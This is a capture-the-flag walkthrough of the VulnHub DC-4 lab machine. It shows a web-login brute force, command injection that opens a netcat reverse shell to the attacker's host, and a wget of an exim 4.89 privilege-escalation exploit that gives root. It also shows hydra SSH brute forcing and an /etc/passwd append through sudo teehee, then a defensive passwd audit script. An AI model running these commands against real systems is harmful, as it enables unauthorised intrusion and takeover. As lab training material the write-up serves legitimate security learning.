VulnHub DC-4

Information gathering

arp-scan -l # the target turns out to be 192.168.150.213

nmap -T4 -p- -A 192.168.150.213 # scan all ports and show everything nmap can identify

Ports 22 and 80 are open.

Exploitation

Port 80 serves a login page. Capture the login request in Burp and brute-force it: the username is usually admin/Admin, and the password list can be Burp's built-in one (click "Add from list", then "Passwords").
The brute force yields admin/happy. After logging in there are three command-execution functions. Start a listener first with nc -lvvp 8000, then capture the request in Burp, change the radio parameter to nc 192.168.150.213 8000 -e /bin/bash, forward the request, and the reverse shell connects back.

Privilege escalation via exim4

└─$ nc -lvvp 8000
listening on [any] 8000 ...                                                                                                                                
192.168.150.213: inverse host lookup failed: Unknown host                                                                                                  
connect to [192.168.150.227] from (UNKNOWN) [192.168.150.213] 58252                                                                                        

ls                                                                                                                                                         
command.php
css
images
index.php
login.php
logout.php
pwd
/usr/share/nginx/html
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh

exim4 --version
Exim version 4.89 #2 built 10-Feb-2018 08:26:05
Copyright (c) University of Cambridge, 1995 - 2017
(c) The Exim Maintainers and contributors in ACKNOWLEDGMENTS file, 2007 - 2017
Berkeley DB: Berkeley DB 5.3.28: (September  9, 2013)
Support for: crypteq iconv() IPv6 GnuTLS move_frozen_messages DKIM DNSSEC Event OCSP PRDR SOCKS TCP_Fast_Open
Lookups (built-in): lsearch wildlsearch nwildlsearch iplsearch cdb dbm dbmjz dbmnz dnsdb dsearch nis nis0 passwd
Authenticators: cram_md5 plaintext
Routers: accept dnslookup ipliteral manualroute queryprogram redirect
Transports: appendfile/maildir/mailstore autoreply lmtp pipe smtp
Fixed never_users: 0
Configure owner: 0:0
Size of off_t: 8
Configuration file is /var/lib/exim4/config.autogenerated

Look up known exploits for this version

└─$ searchsploit exim 4                                                                                                                                    
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dovecot with Exim - 'sender_address' Remote Command Execution                                                            | linux/remote/25297.txt
Exim - 'GHOST' glibc gethostbyname Buffer Overflow (Metasploit)                                                          | linux/remote/36421.rb
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)                                                            | linux/local/39702.rb
Exim - 'sender_address' Remote Code Execution                                                                            | linux/remote/25970.py
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation                                                            | linux/local/40054.c
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow                                                                    | linux/local/756.c
Exim 4.41 - 'dns_build_reverse' Local Read Emails                                                                        | linux/local/1009.c
Exim 4.42 - Local Privilege Escalation                                                                                   | linux/local/796.sh
Exim 4.43 - 'auth_spa_server()' Remote                                                                                   | linux/remote/812.c
Exim 4.63 - Remote Command Execution                                                                                     | linux/remote/15725.pl
Exim 4.84-3 - Local Privilege Escalation                                                                                 | linux/local/39535.sh
Exim 4.87 - 4.91 - Local Privilege Escalation                                                                            | linux/local/46996.sh
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                                                               | linux/local/47307.rb
Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)                                                               | linux/local/47307.rb
Exim 4.87 < 4.91 - (Local / Remote) Command Execution                                                                    | linux/remote/46974.txt
Exim 4.89 - 'BDAT' Denial of Service                                                                                     | multiple/dos/43184.txt
exim 4.90 - Remote Code Execution                                                                                        | linux/remote/45671.py
Exim < 4.86.2 - Local Privilege Escalation                                                                               | linux/local/39549.txt
Exim < 4.90.1 - 'base64d' Remote Code Execution                                                                          | linux/remote/44571.py
Exim ESMTP 4.80 - glibc gethostbyname Denial of Service                                                                  | linux/dos/35951.py
Exim Internet Mailer 3.35/3.36/4.10 - Format String                                                                      | linux/local/22066.c
Exim Sender 3.35 - Verification Remote Stack Buffer Overrun                                                              | linux/remote/24093.c
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)                                                  | linux/remote/16925.rb
MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow                                                                     | linux/dos/23896.txt
OpenBSD 3.3 - 'Semget()' Integer Overflow (1)                                                                            | openbsd/local/23046.c
OpenBSD 3.3 - 'Semget()' Integer Overflow (2)                                                                            | openbsd/local/23047.c
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution                                                                 | php/webapps/42221.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

└─$ sudo find / -name 46996.sh                                                                                                                 
/usr/share/exploitdb/exploits/linux/local/46996.sh

└─$ systemctl start ap
apache-htcacheclean.service  apache2.service              apparmor.service             apt-daily-upgrade.service    apt-daily.service

└─$ systemctl start apache2.service                                                                                                                      
└─$ sudo cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html/

Download the script onto the target machine

wget http://192.168.150.227/46996.sh

python -c "import pty;pty.spawn('/bin/bash')"   # no output is echoed here, so use python to spawn an interactive shell

www-data@dc-4:/usr/share/nginx/html$ wget http://192.168.150.227/46996.sh
wget http://192.168.150.227/46996.sh
--2024-03-12 03:14:52--  http://192.168.150.227/46996.sh
Connecting to 192.168.150.227:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
46996.sh: Permission denied  

# insufficient permissions, switch to another directory

Cannot write to '46996.sh' (Permission denied).
www-data@dc-4:/usr/share/nginx/html$ cd /tmp    
cd /tmp
www-data@dc-4:/tmp$ wget http://192.168.150.227/46996.sh
wget http://192.168.150.227/46996.sh
--2024-03-12 03:15:21--  http://192.168.150.227/46996.sh
Connecting to 192.168.150.227:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3552 (3.5K) [text/x-sh]
Saving to: '46996.sh'

46996.sh            100%[===================>]   3.47K  --.-KB/s    in 0s      

2024-03-12 03:15:21 (697 MB/s) - '46996.sh' saved [3552/3552]


www-data@dc-4:/tmp$ chmod +x 46996.sh
chmod +x 46996.sh


www-data@dc-4:/tmp$ ./46996.sh
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-4 ESMTP Exim 4.89 Tue, 12 Mar 2024 03:15:58 +1000
250 dc-4 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1rjjFm-0000DL-JB
221 dc-4 closing connection

Waiting 5 seconds...
-rwsr-xr-x 1 root www-data 124492 Mar 12 03:15 /tmp/pwned
# whoami
root   # root obtained
# cd /root

# ls

flag.txt

# cat flag.txt


888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
# 


Privilege escalation via teehee

Looking for clue files


└─$ nc -lvvp 8000                                                                                                                                          
listening on [any] 8000 ...
192.168.150.213: inverse host lookup failed: Unknown host
connect to [192.168.150.227] from (UNKNOWN) [192.168.150.213] 55694
python -c "import pty;pty.spawn('/bin/bash')"



www-data@dc-4:~$ pwd
pwd
/var/www
www-data@dc-4:~$ cd ..
cd ..
www-data@dc-4:/var$ cd /home    
cd /home
www-data@dc-4:/home$ ls
ls
charles  jim  sam
www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls
ls
backups  mbox  test.sh
www-data@dc-4:/home/jim$ cd backups
cd backups
www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak

www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
……

This gives some old passwords belonging to the user jim.

Brute-force the jim user with hydra


└─$ vim jim.txt

┌──(kali㉿kali)-[~/Downloads]
└─$ hydra -l jim -P jim.txt 192.168.150.213 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-12 01:35:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.150.213:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 120 to do in 00:01h, 12 active
[STATUS] 98.00 tries/min, 196 tries in 00:02h, 60 to do in 00:01h, 12 active
[22][ssh] host: 192.168.150.213   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-12 01:38:07

After logging in there is a notice that the user has mail.

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh jim@192.168.150.213
The authenticity of host '192.168.150.213 (192.168.150.213)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? y
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.150.213' (ED25519) to the list of known hosts.
jim@192.168.150.213's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

You have mail.

Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cd /var/spool/mail
jim@dc-4:/var/spool/mail$ ls
jim  www-data
jim@dc-4:/var/spool/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/spool/mail$ su charles
Password: 
charles@dc-4:/var/spool/mail$ ls
jim  www-data
charles@dc-4:/var/spool/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:/var/spool/mail$ echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
admin::0:0:::/bin/bash
charles@dc-4:/var/spool/mail$ su admin
root@dc-4:/var/spool/mail# id
uid=0(root) gid=0(root) groups=0(root)
PS: the meaning of each field in /etc/passwd is
username:password:User ID:Group ID:comment:home directory:shell

To sum up: the mail contains charles's password, so switch to charles with su; sudo -l shows that teehee can be run as root without a password; append a user named admin with an empty password field and UID 0, and su admin then gives a root shell.
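From the defender's side, the line appended above is easy to spot: a second UID-0 account and an empty password field are both things /etc/passwd should never contain. The following audit script is an added example, not part of the DC-4 box or of the original write-up; it runs over a constructed passwd excerpt that includes the injected admin line, and can be pointed at a real /etc/passwd instead.

```python
"""Audit /etc/passwd-style content for the kind of entry the teehee trick
appends: an extra UID-0 account, an empty password field, or a malformed line.
Added example, not part of DC-4 or the original write-up."""
from typing import List

# Constructed sample: a normal passwd excerpt plus the injected line from the write-up.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1001:1001:jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:charles,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""

FIELDS = ("username", "password", "uid", "gid", "comment", "home", "shell")


def parse_passwd(text: str) -> List[dict]:
    """Split each non-empty line into the seven colon-separated fields.
    Lines with the wrong field count are kept and marked as malformed."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        parts = line.split(":")
        entry = {"lineno": lineno, "raw": line}
        if len(parts) != len(FIELDS):
            entry["malformed"] = True
        else:
            entry.update(zip(FIELDS, parts))
        entries.append(entry)
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious condition, in file order."""
    findings = []
    for e in parse_passwd(text):
        if e.get("malformed"):
            findings.append(f"line {e['lineno']}: malformed entry {e['raw']!r}")
            continue
        if e["uid"] == "0" and e["username"] != "root":
            findings.append(f"line {e['lineno']}: extra UID-0 account {e['username']!r}")
        if e["password"] == "":
            findings.append(f"line {e['lineno']}: empty password field for {e['username']!r}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Replace SAMPLE_PASSWD with the contents of the real file (for example open("/etc/passwd").read()) to run it on a host; an empty result list means nothing matched.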
